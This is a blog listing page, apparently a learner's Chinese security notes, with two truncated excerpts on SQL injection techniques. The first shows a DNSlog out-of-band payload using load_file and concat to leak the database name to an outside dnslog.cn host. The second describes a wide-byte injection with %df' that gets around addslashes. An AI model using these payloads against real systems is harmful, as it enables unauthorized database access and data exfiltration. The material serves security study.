摘要:
DNSlog平台:http://www.dnslog.cn/ 获取数据库名: 1' and (load_file(concat('//',(select database()),'.q5lobx.dnslog.cn/abc')))%23 获取表名 1' and (load_file(concat(' 阅读全文
posted @ 2025-02-19 23:35
小圣爱学习
阅读(48)
评论(0)
推荐(0)
摘要:
1.判断注入 1.输入 1',addslashes函数将 ' 进行转义变为 \' ,此时的单引号仅作为普通的字符 2.输入1%df',addslashes 函数将 ' 进行转义变为 \' ,此时 %df%5c会进行结合变成了一个汉字 運,因此SQL查询语句成功被改变了从而引起了报错 1%df' => 阅读全文
posted @ 2025-02-19 20:28
小圣爱学习
阅读(60)
评论(0)
推荐(0)
浙公网安备 33010602011771号